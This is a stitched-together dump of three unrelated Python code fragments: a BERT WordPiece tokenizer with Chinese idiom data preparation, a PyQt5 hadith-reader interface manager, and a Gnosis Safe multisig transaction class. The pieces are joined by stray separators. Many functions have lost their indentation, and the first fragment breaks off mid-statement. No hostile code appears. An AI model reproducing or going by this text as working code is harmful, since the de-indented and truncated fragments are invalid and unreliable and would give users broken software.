        if ((cp >= 0x4E00 and cp <= 0x9FFF) or  #
                (cp >= 0x3400 and cp <= 0x4DBF) or  #
                (cp >= 0x20000 and cp <= 0x2A6DF) or  #
                (cp >= 0x2A700 and cp <= 0x2B73F) or  #
                (cp >= 0x2B740 and cp <= 0x2B81F) or  #
                (cp >= 0x2B820 and cp <= 0x2CEAF) or
                (cp >= 0xF900 and cp <= 0xFAFF) or  #
                (cp >= 0x2F800 and cp <= 0x2FA1F)):  #
            return True
        return False
    def _clean_text(self, text):
        """Performs invalid character removal and whitespace cleanup on text."""
        output = []
        for char in text:
            cp = ord(char)
            if cp == 0 or cp == 0xfffd or _is_control(char):
                # Drop NUL, the Unicode replacement char, and control chars.
                continue
            if _is_whitespace(char):
                output.append(" ")
            else:
                output.append(char)
        return "".join(output)
class WordpieceTokenizer(object):
    """Runs WordPiece tokenization."""
    def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
        self.vocab = vocab  # token -> id mapping; only membership is used here
        self.unk_token = unk_token  # emitted for unsplittable or overlong words
        self.max_input_chars_per_word = max_input_chars_per_word
    def tokenize(self, text):
        """Tokenizes a piece of text into its word pieces.
        This uses a greedy longest-match-first algorithm to perform tokenization
        using the given vocabulary.
        For example:
          input = "unaffable"
          output = ["un", "##aff", "##able"]
        Args:
          text: A single token or whitespace separated tokens. This should have
            already been passed through `BasicTokenizer.
        Returns:
          A list of wordpiece tokens.
        """
        text = convert_to_unicode(text)
        output_tokens = []
        for token in whitespace_tokenize(text):
            chars = list(token)
            if len(chars) > self.max_input_chars_per_word:
                # Pathologically long word: emit [UNK] instead of splitting.
                output_tokens.append(self.unk_token)
                continue
            is_bad = False
            start = 0
            sub_tokens = []
            while start < len(chars):
                end = len(chars)
                cur_substr = None
                # Greedy longest-match-first: shrink the candidate from the
                # right until it is found in the vocab.
                while start < end:
                    substr = "".join(chars[start:end])
                    if start > 0:
                        # Continuation pieces carry the "##" prefix.
                        substr = "##" + substr
                    if substr in self.vocab:
                        cur_substr = substr
                        break
                    end -= 1
                if cur_substr is None:
                    # No prefix of the remainder is in the vocab: whole word -> [UNK].
                    is_bad = True
                    break
                sub_tokens.append(cur_substr)
                start = end
            if is_bad:
                output_tokens.append(self.unk_token)
            else:
                output_tokens.extend(sub_tokens)
        return output_tokens
def _is_chinese_char(cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
# Build the shared tokenizer from the bundled vocabulary; casing is preserved
# and whole-word masking is disabled.
tokenizer = FullTokenizer(
    vocab_file='../kernel/vocab.txt',
    do_lower_case=False,
    do_whole_word_mask=False)
import jieba
# Teach jieba to treat each reserved "[unusedN]" placeholder as a single word
# so it survives word segmentation intact.
for word in unused_token:
    jieba.add_word(word)
# Smoke test: the [unused1] placeholder must survive jieba + BERT tokenization.
print(tokenizer.tokenize(" ".join(jieba.cut('罗杰·加西亚和贝拉乌桑几乎[unused1]的情况下'))))
# Load the idiom dictionary (one JSON object per line): idiom -> explanation.
idiom_dict = {}
length = []  # explanation lengths, collected for inspection
left = []  # NOTE(review): presumably idioms whose explanation (>= 64 chars) is too long — confirm downstream use
import json, codecs
with codecs.open('../kernel/idiomDict_clean.json', 'r', 'utf-8') as frobj:
    for i, line in enumerate(frobj):
        content = json.loads(line.strip())
        # 'info' may be a single string or a list of sentences; join lists
        # with the Chinese full stop.
        if isinstance(content['info'], list):
            idiom_dict[content['word']] = "。".join(content['info'])
        else:
            idiom_dict[content['word']] = content['info']
        length.append(len(idiom_dict[content['word']]))
        if len(idiom_dict[content['word']]) >= 64:
            left.append(content['word'])
import jieba
import copy, json
import codecs
import re
answer_pattern = re.compile('#idiom\d+#')
postprocess_answer_pattern = re.compile('\[unused\d+\]')
from collections import namedtuple
max_length = 272
answer_length = 10
max_label = 5
input_lst = []
unused_token = {}
for i in range(1, 100):
unused_token['[unused{}]'.format(i)] = i
from itertools import accumulate
import random
def cut_doc(tokens_a_id, answer_symbol_id_pos, answer_symbol, max_length):
    """Trim `tokens_a_id` to a window of at most roughly `max_length` tokens
    that still contains the answer position `answer_symbol_id_pos`.

    `answer_symbol` is accepted for interface compatibility but unused.
    Raises AssertionError if the answer token falls outside the window.
    """
    head = tokens_a_id[:answer_symbol_id_pos]
    tail = tokens_a_id[answer_symbol_id_pos:]
    half = max_length // 2
    if len(head) < half:
        # Answer sits near the front: keep the head, trim the tail.
        start = 0
        end = min(len(head) + 1 + len(tail), max_length - 3)
    elif len(tail) < half:
        # Answer sits near the back: keep the tail, trim the head.
        end = len(head) + 1 + len(tail)
        start = max(0, end - (max_length - 3))
    else:
        # Answer sits in the middle: trim both sides symmetrically.
        start = len(head) + 3 - half
        end = len(head) + half
    window = tokens_a_id[start:end]
    assert tokens_a_id[answer_symbol_id_pos] in window
    return window
# Vocabulary ids of the "[unusedN]" placeholder tokens, in insertion order.
unused_id = [tokenizer.vocab[unused_word] for unused_word in list(unused_token.keys())]
def replace_unused2mask(tokens_a_id, unused_id, mask_id):
for i, | |
import sys, os
from random import randint
from PyQt5 import QtCore, QtGui, QtWidgets
from source.hapi import HadithApi
from source.hconfig import HConfig
class Ui_Manager():
    """
    This class is used to add hadith data to the user interface.

    Methods
    -------
    initialize_ui()
        Loads the source, book and title combo boxes and the hadith text.
    _update_btn_icon()
        Updates the path to the random icon to an absolute path.
    _update_layout()
        Updates the layout of the hadith reader so it supports the current
        language.
    _select_lang()
        Event handler for the language menu items.
    _next_btn_handler()
        Event handler for the next button.
    _prev_btn_handler()
        Event handler for the previous button.
    _rand_hadith()
        Loads a random hadith in the hadith box.
    _next_hadith()
        Loads the next hadith.
    _prev_hadith()
        Loads the previous hadith.
    _source_selected()
        It loads the book and title combo boxes and also the hadith box.
    _book_selected()
        It loads the title combo box and the hadith box.
    _get_current_selection()
        It returns the currently selected source, book and title.
    _load_hadith()
        It updates the hadith box with the current hadith.
    _load_source_list()
        It loads the source combo box with list of sources.
    _load_book_list()
        It loads the book combo box with list of books.
    _load_title_list()
        It loads the title combo box with list of titles for the selected
        hadith source and book.
    _update_settings()
        It saves the current settings to database.
    _load_settings()
        It loads the current settings from database.
    """
    def initialize_ui(self, MainWindow: QtWidgets.QMainWindow) -> None:
        """It initializes the reader layout.

        - It sets the current language from the application configuration
          and restores saved settings from the database.
        - It loads the source combo box with list of hadith sources.
        - It loads the book combo box with books in the current hadith source.
        - It loads the title combo box with titles in the current hadith source
          and book.
        - It displays hadith verses in the text area.
        - It connects the source, book and title combo boxes to callbacks.
        - It connects the next, previous and random buttons to callbacks.
        - It connects the language menu items to callbacks.

        :param MainWindow: The hadith reader window object.
        :type MainWindow: QtWidgets.QMainWindow.
        """
        # The application configuration
        hconfig = HConfig()
        self.config = hconfig.get_config()
        # The current language (taken from the configured default)
        self.lang = self.config["default_lang"]
        # Creates an instance of the HadithApi class
        self.api = HadithApi(self.config["db_path"], self.lang)
        # Loads settings from database
        self._load_settings()
        # The main window object is set as obj attribute
        self.MainWindow = MainWindow
        # The layout is updated for the new language
        self._update_layout()
        # Connects the source combo box to a call back
        self.MainWindow.sourceComboBox.activated.connect(self._source_selected)
        # Connects the book combo box to a call back
        self.MainWindow.bookComboBox.activated.connect(self._book_selected)
        # Connects the title combo box to a call back that reloads the hadith
        # text for the newly selected title
        self.MainWindow.titleComboBox.activated.connect(self._load_hadith_box)
        # Connects the next button to a call back
        self.MainWindow.nextButton.clicked.connect(self._next_btn_handler)
        # Connects the prev button to a call back
        self.MainWindow.prevButton.clicked.connect(self._prev_btn_handler)
        # Connects the random button to a call back
        self.MainWindow.randomButton.clicked.connect(self._rand_hadith)
        # Connects the urdu checkbox menu item to a call back
        self.MainWindow.actionUrdu.triggered.connect(self._select_lang)
        # Connects the english checkbox menu item to a call back
        self.MainWindow.actionEnglish.triggered.connect(self._select_lang)
        # Connects the arabic checkbox menu item to a call back
        self.MainWindow.actionArabic.triggered.connect(self._select_lang)
        # Update the language menu so only one item can be selected at a time
        self.MainWindow.langGroup.setExclusive(True)
        # Updates the icon path
        self._update_btn_icon()
        # Loads the source combo box with list of sources
        self._load_source_list()
        # Loads the book combo box with list of books
        self._load_book_list()
        # Loads the title combo box with list of titles
        self._load_title_list()
        # Displays the hadith text
        self._load_hadith_box()
def _update_btn_icon(self) -> None:
"""Updates the path to the random icon to an absolute path.
"""
# An icon is created
icon = QtGui.QIcon()
# The path to the random.png image
icon.addPixmap(
QtGui.QPixmap(self.config["random_icon_path"]),
QtGui.QIcon.Normal, QtGui.QIcon.Off)
# The icon is set
self.MainWindow.randomButton.setIcon(icon)
    def _update_layout(self) -> None:
        """Updates the layout of the hadith reader so it supports the current
        language.

        The position of the combo boxes, labels and buttons is updated. The
        locale, layout direction and fonts of the widgets are updated as
        well. The current language is checked in the language menu.
        """
        # If the current language is "English"
        if self.lang == "English":
            # The English option is selected
            self.MainWindow.actionEnglish.setChecked(True)
            # The position of the combo boxes is updated (left-to-right order)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.bookComboBox, 5, 1, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.sourceComboBox, 5, 0, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.titleComboBox, 5, 2, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.sourceLabel, 2, 0, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.bookLabel, 2, 1, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.titleLabel, 2, 2, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.prevButton, 5, 8, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.randomButton, 5, 9, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.nextButton, 5, 7, 1, 1)
            # The direction of the combo boxes is updated
            self.MainWindow.bookComboBox.setLayoutDirection(
                QtCore.Qt.LeftToRight)
            self.MainWindow.bookComboBox.setLocale(
                QtCore.QLocale(
                    QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
            self.MainWindow.titleComboBox.setLayoutDirection(
                QtCore.Qt.LeftToRight)
            self.MainWindow.titleComboBox.setLocale(
                QtCore.QLocale(
                    QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
            self.MainWindow.sourceComboBox.setLayoutDirection(
                QtCore.Qt.LeftToRight)
            self.MainWindow.sourceComboBox.setLocale(
                QtCore.QLocale(
                    QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
            # The font for the combo boxes is updated
            font = QtGui.QFont()
            font.setFamily("DejaVu Sans")
            font.setPointSize(10)
            font.setBold(True)
            self.MainWindow.bookComboBox.setFont(font)
            self.MainWindow.titleComboBox.setFont(font)
            self.MainWindow.sourceComboBox.setFont(font)
            # The hadith text reuses the same family, unbolded and larger
            font.setBold(False)
            font.setPointSize(12)
            self.MainWindow.hadithText.setFont(font)
        else:
            # If the language is Urdu
            if self.lang == "Urdu":
                self.MainWindow.actionUrdu.setChecked(True)
            else:
                self.MainWindow.actionArabic.setChecked(True)
            # The position of the combo boxes is updated (mirrored layout
            # for the right-to-left scripts)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.bookComboBox, 5, 9, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.sourceComboBox, 5, 10, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.titleComboBox, 5, 5, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.sourceLabel, 2, 10, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.bookLabel, 2, 9, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.titleLabel, 2, 5, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.randomButton, 5, 4, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.nextButton, 5, 1, 1, 1)
            self.MainWindow.gridLayout.addWidget(
                self.MainWindow.prevButton, 5, 3, 1, 1)
            # The layout of the combo boxes is updated
            self.MainWindow.bookComboBox.setLayoutDirection(
                QtCore.Qt.RightToLeft)
            self.MainWindow.bookComboBox.setLocale(
                QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
            self.MainWindow.titleComboBox.setLayoutDirection(
                QtCore.Qt.RightToLeft)
            self.MainWindow.titleComboBox.setLocale(
                QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
            self.MainWindow.sourceComboBox.setLayoutDirection(
                QtCore.Qt.RightToLeft)
            self.MainWindow.sourceComboBox.setLocale(
                QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
            # The font of the combo boxes is updated
            font = QtGui.QFont()
            font.setFamily("Nafees [PYRS]")
            font.setPointSize(14)
            font.setBold(False)
            font.setWeight(50)
            self.MainWindow.bookComboBox.setFont(font)
            self.MainWindow.titleComboBox.setFont(font)
            self.MainWindow.sourceComboBox.setFont(font)
            # The hadith text reuses the same family at a larger size
            font.setPointSize(18)
            self.MainWindow.hadithText.setFont(font)
    def _select_lang(self) -> None:
        """Event handler for the language menu items.

        It sets the current language to the selected language. It changes the
        language of the text in the hadith box to the selected language.
        """
        # The translate function
        _translate = QtCore.QCoreApplication.translate
        # The status text and shortcut keys are updated
        self.MainWindow.nextButton.setStatusTip(_translate("MainWindow",
            "Next Hadith (Ctrl+N)"))
        self.MainWindow.nextButton.setShortcut(_translate("MainWindow",
            "Ctrl+N"))
        self.MainWindow.prevButton.setStatusTip(_translate("MainWindow",
            "Previous Hadith (Ctrl+P)"))
        self.MainWindow.prevButton.setShortcut(_translate("MainWindow",
            "Ctrl+P"))
        # If the currently selected language is Urdu
        if self.MainWindow.actionUrdu.isChecked():
            # The current language is set
            self.lang = "Urdu"
        # If the currently selected language is English
        elif self.MainWindow.actionEnglish.isChecked():
            # The current language is set
            self.lang = "English"
            # The status tips and shortcuts are deliberately swapped for
            # English: the layout is mirrored for left-to-right text, and
            # _next_btn_handler/_prev_btn_handler likewise invert their
            # actions for this language.
            # NOTE(review): the stray space in "self.MainWindow. prevButton"
            # below is valid Python and left untouched.
            self.MainWindow.nextButton.setStatusTip(_translate("MainWindow",
                "Previous Hadith (Ctrl+P)"))
            self.MainWindow.nextButton.setShortcut(_translate("MainWindow",
                "Ctrl+P"))
            self.MainWindow. prevButton.setStatusTip(_translate("MainWindow",
                "Next Hadith (Ctrl+N)"))
            self.MainWindow.prevButton.setShortcut(_translate("MainWindow",
                "Ctrl+N"))
        # If the currently selected language is Arabic
        elif self.MainWindow.actionArabic.isChecked():
            # The current language is set
            self.lang = "Arabic"
        # The layout is updated for the new language
        self._update_layout()
        # The current language is set in the api object
        self.api.set_lang(self.lang)
        # Loads the source combo box with list of sources
        self._load_source_list()
        # Loads the book combo box with list of books
        self._load_book_list()
        # Loads the title combo box with list of titles
        self._load_title_list()
        # Loads the hadith box with text
        self._load_hadith_box()
        # The settings are updated in database
        self._update_settings()
def _next_btn_handler(self) -> None:
"""Even handler for the next button.
If the current language is "en", then it calls the _prev_hadith method.
Otherwise it calls the _next_hadith method.
"""
# If the current language is "English"
if self.lang == "English":
# The _prev_hadith method is called
self._prev_hadith()
else:
# The _next_hadith method is called
self._next_hadith()
# The settings are updated in database
self._update_settings()
def _prev_btn_handler(self) -> None:
"""Even handler for the prev button.
If the current language is "English", then it calls the _next_hadith
method. Otherwise it calls the _prev_hadith method.
"""
# If the current language is "English"
if self.lang == "English":
# The _next_hadith method is called
self._next_hadith()
else:
# The _prev_hadith method is called
self._prev_hadith()
# The settings are updated in database
self._update_settings()
| |
# <gh_stars>0  -- repository-metadata artifact left by the dataset export
from typing import Any, Dict, List, NoReturn, Optional, Tuple, Type
from eip712_structs import Address, Bytes, EIP712Struct, Uint, make_domain
from eip712_structs.struct import StructTuple
from eth_account import Account
from hexbytes import HexBytes
from packaging.version import Version
from web3 import Web3
from web3.exceptions import BadFunctionCallOutput, ContractLogicError
from web3.types import BlockIdentifier, TxParams, Wei
from gnosis.eth import EthereumClient
from gnosis.eth.constants import NULL_ADDRESS
from gnosis.eth.contracts import get_safe_contract
from ..eth.ethereum_client import TxSpeed
from .exceptions import (
CouldNotFinishInitialization,
CouldNotPayGasWithEther,
CouldNotPayGasWithToken,
HashHasNotBeenApproved,
InvalidContractSignatureLocation,
InvalidInternalTx,
InvalidMultisigTx,
InvalidOwnerProvided,
InvalidSignaturesProvided,
MethodCanOnlyBeCalledFromThisContract,
ModuleManagerException,
NotEnoughSafeTransactionGas,
OnlyOwnersCanApproveAHash,
OwnerManagerException,
SafeTransactionFailedWhenGasPriceAndSafeTxGasEmpty,
SignatureNotProvidedByOwner,
SignaturesDataTooShort,
ThresholdNeedsToBeDefined,
)
from .safe_signature import SafeSignature
from .signatures import signature_to_bytes
try:
from functools import cached_property
except ImportError:
from cached_property import cached_property
class EIP712SafeTx(EIP712Struct):
    """EIP-712 struct of a Safe transaction for contract versions >= 1.0.0
    (uses the `baseGas` field name)."""
    to = Address()
    value = Uint(256)
    data = Bytes()
    operation = Uint(8)
    safeTxGas = Uint(256)
    baseGas = Uint(256)  # `dataGas` was renamed to `baseGas` in 1.0.0
    gasPrice = Uint(256)
    gasToken = Address()
    refundReceiver = Address()
    nonce = Uint(256)
class EIP712LegacySafeTx(EIP712Struct):
    """EIP-712 struct of a Safe transaction for contract versions < 1.0.0
    (uses the legacy `dataGas` field name)."""
    to = Address()
    value = Uint(256)
    data = Bytes()
    operation = Uint(8)
    safeTxGas = Uint(256)
    dataGas = Uint(256)  # legacy name; renamed to `baseGas` in 1.0.0
    gasPrice = Uint(256)
    gasToken = Address()
    refundReceiver = Address()
    nonce = Uint(256)
# Both struct layouts must hash under the canonical EIP-712 type name
# "SafeTx" (the Python class names are only local identifiers).
EIP712SafeTx.type_name = "SafeTx"
EIP712LegacySafeTx.type_name = "SafeTx"
class SafeTx:
    """A Gnosis Safe multisig transaction: holds the transaction fields,
    computes its EIP-712 hash, collects signatures and executes it."""
    tx: TxParams  # Set only after a successful `execute`
    tx_hash: bytes  # Set only after a successful `execute`
    def __init__(
        self,
        ethereum_client: EthereumClient,
        safe_address: str,
        to: str,
        value: int,
        data: bytes,
        operation: int,
        safe_tx_gas: int,
        base_gas: int,
        gas_price: int,
        gas_token: str,
        refund_receiver: str,
        signatures: bytes = b"",
        safe_nonce: Optional[int] = None,
        safe_version: Optional[str] = None,
        chain_id: Optional[int] = None,
    ):
        """
        :param ethereum_client: client used to talk to the Ethereum node
        :param safe_address: address of the Safe contract
        :param to: destination address (falls back to NULL_ADDRESS when empty)
        :param value:
        :param data: call payload, stored as HexBytes (empty bytes when falsy)
        :param operation:
        :param safe_tx_gas:
        :param base_gas:
        :param gas_price:
        :param gas_token: token used to refund gas (NULL_ADDRESS when empty)
        :param refund_receiver: refund destination (NULL_ADDRESS when empty)
        :param signatures: concatenated owner signatures as raw bytes
        :param safe_nonce: Current nonce of the Safe. If not provided, it will be retrieved from network
        :param safe_version: Safe version 1.0.0 renamed `baseGas` to `dataGas`. Safe version 1.3.0 added `chainId` to
            the `domainSeparator`. If not provided, it will be retrieved from network
        :param chain_id: Ethereum network chain_id is used in hash calculation for Safes >= 1.3.0. If not provided,
            it will be retrieved from the provided ethereum_client
        """
        # Only raw bytes are accepted (not hex strings).
        assert isinstance(signatures, bytes), "Signatures must be bytes"
        self.ethereum_client = ethereum_client
        self.safe_address = safe_address
        self.to = to or NULL_ADDRESS
        self.value = value
        self.data = HexBytes(data) if data else b""
        self.operation = operation
        self.safe_tx_gas = safe_tx_gas
        self.base_gas = base_gas
        self.gas_price = gas_price
        self.gas_token = gas_token or NULL_ADDRESS
        self.refund_receiver = refund_receiver or NULL_ADDRESS
        self.signatures = signatures
        # Lazily resolved values; see the corresponding cached properties.
        self._safe_nonce = safe_nonce
        self._safe_version = safe_version
        self._chain_id = chain_id
    def __str__(self):
        """Human-readable one-line summary of the transaction (note that
        evaluating `self.signers` may parse the attached signatures)."""
        return (
            f"SafeTx - safe={self.safe_address} - to={self.to} - value={self.value} - data={self.data.hex()} - "
            f"operation={self.operation} - safe-tx-gas={self.safe_tx_gas} - base-gas={self.base_gas} - "
            f"gas-price={self.gas_price} - gas-token={self.gas_token} - refund-receiver={self.refund_receiver} - "
            f"signers = {self.signers}"
        )
    @property
    def w3(self):
        """Web3 instance of the underlying Ethereum client."""
        return self.ethereum_client.w3
    @cached_property
    def contract(self):
        """Web3 contract object bound to the Safe address (built once)."""
        return get_safe_contract(self.w3, address=self.safe_address)
@cached_property
def chain_id(self) -> int:
if self._chain_id is not None:
return self._chain_id
else:
return self.w3.eth.chain_id
    @cached_property
    def safe_nonce(self) -> int:
        """Current Safe nonce: the constructor value when given, otherwise
        read once from the contract."""
        # NOTE(review): return annotation fixed from `str` -- both the
        # constructor argument (Optional[int]) and the contract call return
        # an integer nonce.
        if self._safe_nonce is not None:
            return self._safe_nonce
        else:
            return self.contract.functions.nonce().call()
@cached_property
def safe_version(self) -> str:
if self._safe_version is not None:
return self._safe_version
else:
return self.contract.functions.VERSION().call()
    @property
    def _eip712_payload(self) -> StructTuple:
        """Build the EIP-712 (message, domain) pair for this transaction."""
        data = self.data.hex() if self.data else ""
        safe_version = Version(self.safe_version)
        # `dataGas` was renamed to `baseGas` in 1.0.0, so pick the struct
        # layout matching the deployed contract version.
        cls = EIP712SafeTx if safe_version >= Version("1.0.0") else EIP712LegacySafeTx
        # NOTE(review): both `baseGas` and `dataGas` are passed regardless of
        # the chosen class -- presumably the struct ignores the field it does
        # not declare; confirm against eip712_structs behaviour.
        message = cls(
            to=self.to,
            value=self.value,
            data=data,
            operation=self.operation,
            safeTxGas=self.safe_tx_gas,
            baseGas=self.base_gas,
            dataGas=self.base_gas,
            gasPrice=self.gas_price,
            gasToken=self.gas_token,
            refundReceiver=self.refund_receiver,
            nonce=self.safe_nonce,
        )
        # `chainId` is part of the domain separator only from Safe 1.3.0 on.
        domain = make_domain(
            verifyingContract=self.safe_address,
            chainId=self.chain_id if safe_version >= Version("1.3.0") else None,
        )
        return StructTuple(message, domain)
@property
def eip712_structured_data(self) -> Dict:
message, domain = self._eip712_payload
return message.to_message(domain)
@property
def safe_tx_hash(self) -> HexBytes:
message, domain = self._eip712_payload
signable_bytes = message.signable_bytes(domain)
return HexBytes(Web3.keccak(signable_bytes))
@property
def signers(self) -> List[str]:
if not self.signatures:
return []
else:
return [
safe_signature.owner
for safe_signature in SafeSignature.parse_signature(
self.signatures, self.safe_tx_hash
)
]
@property
def sorted_signers(self):
return sorted(self.signers, key=lambda x: int(x, 16))
    @property
    def w3_tx(self):
        """
        :return: Web3 contract tx prepared for `call`, `transact` or `buildTransaction`
        """
        # Arguments must follow the exact order of `execTransaction` in the
        # Safe contract ABI.
        return self.contract.functions.execTransaction(
            self.to,
            self.value,
            self.data,
            self.operation,
            self.safe_tx_gas,
            self.base_gas,
            self.gas_price,
            self.gas_token,
            self.refund_receiver,
            self.signatures,
        )
    def _raise_safe_vm_exception(self, message: str) -> NoReturn:
        """Map a revert reason coming from the Safe contract to a specific
        `InvalidMultisigTx` subclass and raise it.

        Matching is done by substring, so both the legacy textual reasons
        and the short GSxxx codes are covered.

        :param message: revert/error string returned by the node
        :raises InvalidMultisigTx: always; a more specific subclass when the
            message matches a known reason
        """
        error_with_exception: Dict[str, Type[InvalidMultisigTx]] = {
            # https://github.com/gnosis/safe-contracts/blob/v1.3.0/docs/error_codes.md
            "GS000": CouldNotFinishInitialization,
            "GS001": ThresholdNeedsToBeDefined,
            "Could not pay gas costs with ether": CouldNotPayGasWithEther,
            "GS011": CouldNotPayGasWithEther,
            "Could not pay gas costs with token": CouldNotPayGasWithToken,
            "GS012": CouldNotPayGasWithToken,
            "GS013": SafeTransactionFailedWhenGasPriceAndSafeTxGasEmpty,
            "Hash has not been approved": HashHasNotBeenApproved,
            "Hash not approved": HashHasNotBeenApproved,
            "GS025": HashHasNotBeenApproved,
            "Invalid contract signature location: data not complete": InvalidContractSignatureLocation,
            "GS023": InvalidContractSignatureLocation,
            "Invalid contract signature location: inside static part": InvalidContractSignatureLocation,
            "GS021": InvalidContractSignatureLocation,
            "Invalid contract signature location: length not present": InvalidContractSignatureLocation,
            "GS022": InvalidContractSignatureLocation,
            "Invalid contract signature provided": InvalidContractSignatureLocation,
            "GS024": InvalidContractSignatureLocation,
            "Invalid owner provided": InvalidOwnerProvided,
            "Invalid owner address provided": InvalidOwnerProvided,
            "GS026": InvalidOwnerProvided,
            "Invalid signatures provided": InvalidSignaturesProvided,
            "Not enough gas to execute safe transaction": NotEnoughSafeTransactionGas,
            "GS010": NotEnoughSafeTransactionGas,
            "Only owners can approve a hash": OnlyOwnersCanApproveAHash,
            "GS030": OnlyOwnersCanApproveAHash,
            "GS031": MethodCanOnlyBeCalledFromThisContract,
            "Signature not provided by owner": SignatureNotProvidedByOwner,
            "Signatures data too short": SignaturesDataTooShort,
            "GS020": SignaturesDataTooShort,
            # ModuleManager
            "GS100": ModuleManagerException,
            "Invalid module address provided": ModuleManagerException,
            "GS101": ModuleManagerException,
            "GS102": ModuleManagerException,
            "Invalid prevModule, module pair provided": ModuleManagerException,
            "GS103": ModuleManagerException,
            "Method can only be called from an enabled module": ModuleManagerException,
            "GS104": ModuleManagerException,
            "Module has already been added": ModuleManagerException,
            # OwnerManager
            "Address is already an owner": OwnerManagerException,
            "GS200": OwnerManagerException,  # Owners have already been setup
            "GS201": OwnerManagerException,  # Threshold cannot exceed owner count
            "GS202": OwnerManagerException,  # Invalid owner address provided
            "GS203": OwnerManagerException,  # Invalid ower address provided
            "GS204": OwnerManagerException,  # Address is already an owner
            "GS205": OwnerManagerException,  # Invalid prevOwner, owner pair provided
            "Invalid prevOwner, owner pair provided": OwnerManagerException,
            "New owner count needs to be larger than new threshold": OwnerManagerException,
            "Threshold cannot exceed owner count": OwnerManagerException,
            "Threshold needs to be greater than 0": OwnerManagerException,
        }
        # First matching substring wins; fall back to the generic exception.
        for reason, custom_exception in error_with_exception.items():
            if reason in message:
                raise custom_exception(message)
        raise InvalidMultisigTx(message)
    def call(
        self,
        tx_sender_address: Optional[str] = None,
        tx_gas: Optional[int] = None,
        block_identifier: Optional[BlockIdentifier] = "latest",
    ) -> int:
        """Simulate the Safe transaction with `eth_call` (no state change).

        :param tx_sender_address: sender to simulate with; defaults to the
            Safe address itself
        :param tx_gas: Force a gas limit
        :param block_identifier:
        :return: `1` if everything ok
        :raises InvalidMultisigTx: (or a subclass) when the simulation reverts
        """
        parameters: Dict[str, Any] = {
            "from": tx_sender_address if tx_sender_address else self.safe_address
        }
        if tx_gas:
            parameters["gas"] = tx_gas
        try:
            # `execTransaction` returns a success bit; anything falsy means
            # the inner transaction failed without reverting the outer call.
            success = self.w3_tx.call(parameters, block_identifier=block_identifier)
            if not success:
                raise InvalidInternalTx(
                    "Success bit is %d, should be equal to 1" % success
                )
            return success
        except (ContractLogicError, BadFunctionCallOutput) as exc:
            # e.g. web3.exceptions.ContractLogicError: execution reverted: Invalid owner provided
            return self._raise_safe_vm_exception(str(exc))
        except ValueError as exc:  # Parity
            """
            Parity throws a ValueError, e.g.
            {'code': -32015,
             'message': 'VM execution error.',
             'data': 'Reverted 0x08c379a0000000000000000000000000000000000000000000000000000000000000020000000000000000
                      000000000000000000000000000000000000000000000001b496e76616c6964207369676e6174757265732070726f7669
                      6465640000000000'
            }
            """
            error_dict = exc.args[0]
            data = error_dict.get("data")
            if data and isinstance(data, str) and "Reverted " in data:
                # Parity encodes the revert reason as hex after "Reverted ".
                result = HexBytes(data.replace("Reverted ", ""))
                return self._raise_safe_vm_exception(str(result))
            else:
                raise exc
def recommended_gas(self) -> Wei:
"""
:return: Recommended gas to use on the ethereum_tx
"""
return Wei(self.base_gas + self.safe_tx_gas + 75000)
    def execute(
        self,
        tx_sender_private_key: str,
        tx_gas: Optional[int] = None,
        tx_gas_price: Optional[int] = None,
        tx_nonce: Optional[int] = None,
